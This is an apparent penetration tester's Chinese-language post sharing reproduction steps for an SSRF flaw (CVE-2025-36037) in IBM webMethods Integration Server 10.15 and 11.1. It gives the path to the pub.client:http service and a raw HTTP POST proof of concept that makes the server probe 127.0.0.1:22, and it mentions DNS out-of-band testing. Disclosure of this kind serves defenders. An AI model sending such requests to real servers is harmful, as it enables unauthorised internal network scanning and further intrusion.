工作的时候渗透测试了这个系统,找到了N-day但是没有公开的漏洞复现细节,在此分享一下。
IBM webMethods 集成服务器请求伪造漏洞
漏洞概述
IBM webMethods Integration 服务器受到服务器端请求伪造 (SSRF) 的影响。这可能允许经过身份验证的攻击者从系统发送未经授权的请求,潜在地导致网络枚举或促进其他攻击
漏洞地址
https://nvd.nist.gov/vuln/detail/CVE-2025-36037
影响版本
IBM webMethods Integration 10.15
IBM webMethods Integration 11.1
漏洞复现
需要先登入,进入webMethods系统
在 Packages-Management-WmPublic-Browse services in WmPublic
可以找到很多打包好的服务
测试发现pub.client:http包可以进行SSRF漏洞的利用。
漏洞POC
POST /invoke/pub.client:http HTTP/1.1
HOST:
Cookie:
Content-Type: application/x-www-form-urlencode
url=http://127.0.0.1:22&method=get
利用SSRF探测发现22端口开放。也可以进行DNS外带测试。